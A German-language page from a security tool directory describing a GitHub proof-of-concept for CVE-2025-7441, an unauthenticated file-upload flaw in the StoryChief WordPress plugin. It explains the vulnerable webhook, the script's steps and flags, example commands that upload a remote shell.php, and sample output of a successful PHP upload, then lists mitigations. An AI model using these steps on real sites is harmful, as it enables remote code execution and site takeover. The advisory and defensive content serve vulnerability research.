Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-7441 — StoryChief <= 1.0.42 - Nicht authentifizierter beliebiger Dateiupload | Kitploit
Tools/GitHubGitHub/anothersec/cve-2025-7441
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubanothersec/cve-2025-7441

CVE-2025-7441

StoryChief <= 1.0.42 - Nicht authentifizierter beliebiger Dateiupload

Repository anzeigen
3149vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-7441

CVE-2025-7441 StoryChief 1.0.42 - Beliebiger Datei-Upload

Schwachstelle (CVE-2025-7441) - Technische Zusammenfassung

  • Betroffene Komponente: StoryChief WordPress-Plugin
  • Schwachstellentyp: Nicht authentifizierter beliebiger Datei-Upload
  • Verwundbarer Endpunkt: /wp-json/storychief/webhook
  • Ursache: Das Plugin akzeptiert eine JSON-Webhook-Payload, die eine URL enthält (unter data.featured_image.data.sizes.full) und führt einen serverseitigen HTTP-GET auf diese URL ohne ausreichende Validierung durch (kein Domain-Allowlist, unzureichende MIME-/Inhaltsprüfungen, und Dateien werden unter öffentlichen Upload-Pfaden gespeichert).
  • Auswirkungen: Ein nicht authentifizierter Angreifer kann den Server dazu veranlassen, vom Angreifer kontrollierte Inhalte abzurufen und im WordPress-Uploads-Verzeichnis zu speichern (z. B. wp-content/uploads/YYYY/MM/<dateiname>). Wenn die hochgeladene Datei vom Server interpretiert/ausgeführt werden kann (z. B. eine PHP-Datei, sofern der Server PHP-Ausführung dort erlaubt), führt dies zur Remote-Code-Ausführung (RCE) und vollständigen Kompromittierung der Website.
  • CVSS (Beispiel): 9.8 (Kritisch) — Die Schwere hängt von der Hosting-Konfiguration und den Ausführungsberechtigungen ab.

Über diesen PoC (CVE-2025-7441)

Dieses Skript automatisiert den typischen Ablauf zur Überprüfung der Ausnutzbarkeit der Schwachstelle:

  1. Erstellt eine JSON-Webhook-Payload, die eine Remote-Datei-URL in data.featured_image.data.sizes.full platziert.
  2. Berechnet eine HMAC-SHA256-Signatur über die Payload (das Skript verwendet standardmäßig einen leeren Schlüssel) und speichert sie in meta.mac.
  3. Sendet die Payload per POST an <site_url>/wp-json/storychief/webhook.
  4. Überprüft, ob die abgerufene Datei im erwarteten Upload-Pfad vorhanden ist:

<site_url>/wp-content/uploads///

Wenn die Datei mit HTTP 200 antwortet, meldet das Skript Erfolg; andernfalls gibt es <upload fehlgeschlagen> aus.

Das Skript enthält die folgenden Flags: --file-url, --verbose, --use-curl und --retries.

Verwendung

python3 CVE-2025-7441.py <site_url>

Positionales Argument

  • <site_url> — Basis-URL der Zielseite. Beispiel: http://127.0.0.1:5000/ oder https://target.example/

Flags

  • --file-url — Überschreibt die Standard-Remote-Datei-URL, die der PoC verwendet. Standard: fest codierte Beispiel-Raw-GitHub-URL. Beispiel: --file-url https://127.0.0.1:5000/zip.php
  • --verbose — Aktiviert ausführliche Ausgabe (zeigt Anforderungs-/Antwortdetails und Überprüfungsfortschritt).
  • --use-curl — Verwendet einen curl-Unterprozess zum Senden des POST (Fallback-Modus). Erfordert installiertes curl.
  • --retries — Anzahl der Versuche, den erwarteten Upload-Pfad auf die Datei zu überprüfen. Standard: 1. Verwenden Sie z. B. --retries 5, um mehrmals abzufragen.

Beispielbefehl

python3 CVE-2025-7441.py http://127.0.0.1:5000/

Eine benutzerdefinierte Remote-Datei-URL angeben

python3 CVE-2025-7441.py http://127.0.0.1:5000/  --file-url https://example.com/shell.php

Ausführliche Ausgabe und mehrere Überprüfungen

python3 CVE-2025-7441.py http://127.0.0.1:5000/ --file-url https://example.com/shell.php --verbose --retries 5

Verwendung von curl zum Senden des POST

python3 CVE-2025-7441.py http://127.0.0.1:5000 --file-url https://example.com/shell.php --use-curl --verbose

Ausgabe:

[*] Target: https://127.0.0.1:5000
[*] file_url: https://127.0.0.1:5000/ZIP.php
[*] retries: 3
[*] use_curl: False
[+] computed hmac : 3f2a9b0e4d6c5a1f0b9d6e3c2a1f4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1
[*] Sending POST via requests...
[*] POST status: 200
[*] Response body (truncated):
{"permalink":"/wp-content/uploads/2025/10/ZIP.php","id":12345}
[*] Checking (1/3): https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php
[+] success! [+]
https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php

Gegenmaßnahmen

Gegenmaßnahmen und Behebung Kurzfristig:

  • Aktualisieren Sie StoryChief sofort auf eine gepatchte Version, sobald verfügbar.
  • Blockieren oder beschränken Sie /wp-json/storychief/webhook über WAF oder Server-Regeln.
  • Beschränken Sie ausgehende Abrufe des Servers oder ausgehenden Datenverkehr zu nicht vertrauenswürdigen Domänen.

Entwicklerhinweise:

  • Validieren Sie Dateitypen und -inhalte nach jedem Remote-Abruf; überprüfen Sie Bilder mit sicheren Parsern und lehnen Sie ungültige Dateien ab.
  • Erfordern Sie Authentifizierung für Webhooks, die serverseitige Downloads oder Dateierstellungen auslösen.
  • Stellen Sie sicher, dass die HMAC-/Signaturprüfung implementiert und erzwungen wird.
  • Speichern Sie hochgeladene Inhalte außerhalb des Webroots oder deaktivieren Sie die Ausführung hochgeladener Dateien in wp-content/uploads.
Tool herunterladen